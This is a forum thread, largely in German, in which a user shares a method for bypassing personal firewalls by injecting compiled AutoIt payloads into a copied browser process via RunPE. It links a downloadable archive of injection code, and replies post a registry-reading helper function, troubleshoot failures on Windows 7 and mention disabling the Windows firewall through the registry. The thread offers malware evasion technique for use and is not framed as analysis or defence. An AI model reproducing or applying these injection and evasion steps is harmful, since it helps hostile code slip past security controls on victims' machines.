Hey Guys,

I publish now some unknown code(s) which can be help you to bypass some firewalls.
I found it out with some small tricks in autoit.
Step by Step:

1) You must code a runpe func that creates a new process with the loaded binary data. (You must use NTCompression to inject into explorer,notepad etc.)

2) Code a READEOF Function

3) You should know how you can inject autoit compiled files into other processes.
First you should know, that you must split interpreter and binary script from a compiled autoitFile.
Then you make a copy of the default browser write the binary Script to EOF of the File. Then you inject the interpreter to the EOF written browser et voilá its done.

Example and UDF are attached. (please use it wisely)
Dont forget the credits!!!

http://rapidshare.com/files/351979187/Injection.rar

Hört sich ganz interessant an. ;)
Werds mal laden. ^^

klingt interessant....werde es mir mal anschauen ;)

Die Defaultbrowserfunktion geht leider nicht wenn man firefox installiert hatt/hatte aber jetzt nen andren defaultbrowser benutzt, drum hab ich sie mal gemoddet:


Func Defaultbrowser()
If StringInStr(RegRead("HKEY_CLASSES_ROOT\http\shell\open\command",""),"firefox") <> 0 Then
$value = RegRead ("HKEY_CLASSES_ROOT\Applications\firefox.exe\shell\o pen\command", "")
$new = StringInStr ($value, "firefox.exe")
$test = StringTrimRight ($value, StringLen ($value) - $new - 10)
Return StringtrimLeft ($test, 1)
Else
$DFBAppDirPath = RegRead("HKEY_CLASSES_ROOT\http\shell\open\command","")
$DFBNameArray = StringSplit($DFBAppDirPath,"\")
$DFBName = $DFBNameArray[UBound($DFBNameArray)-1]
$Path = StringTrimLeft($DFBAppDirPath, 1)
Return StringTrimRight($Path,1)
EndIf
EndFunc

Funktioniert allerdings nur bei Firewalls die kein MD5 checken, denke dass wenige moderne gebypassed werden.

Nach jedem Update, und bei jedem neuen Addon ändert sich der md5, wie soll die FW das differenzieren?

Geht leider nicht unter windows 7!
Fehlermeldung:+

http://s10.directupload.net/images/100703/eno8kzxj.png


Edit: habs mit der Originalen Injection.au3 und mit der ersetzten:


Func Defaultbrowser()
If StringInStr(RegRead("HKEY_CLASSES_ROOT\http\shell\ open\command",""),"firefox") <> 0 Then
$value = RegRead ("HKEY_CLASSES_ROOT\Applications\firefox.exe\shell \open\command", "")
$new = StringInStr ($value, "firefox.exe")
$test = StringTrimRight ($value, StringLen ($value) - $new - 10)
Return StringtrimLeft ($test, 1)
Else
$DFBAppDirPath = RegRead("HKEY_CLASSES_ROOT\http\shell\open\command ","")
$DFBNameArray = StringSplit($DFBAppDirPath,"\")
$DFBName = $DFBNameArray[UBound($DFBNameArray)-1]
$Path = StringTrimLeft($DFBAppDirPath, 1)
Return StringTrimRight($Path,1)
EndIf
EndFunc

probiert

Habe damit auch schon ein bisschen probiert und es NOCH nicht zum laufen bekommen. Scheint vielleicht auch an der RunPE zu liegen...?

Man kann die Firewall auch mittels der Registry ausschalten. Auf jeden Fall bei XP, bei Vista und 7 bin ich mir nicht sicher, aber sollte dort auch funktionieren ;)

Man kann die Firewall auch mittels der Registry ausschalten. Auf jeden Fall bei XP, bei Vista und 7 bin ich mir nicht sicher, aber sollte dort auch funktionieren ;)

die windows firewall ... ja ... die interessiert aber nicht großartig ...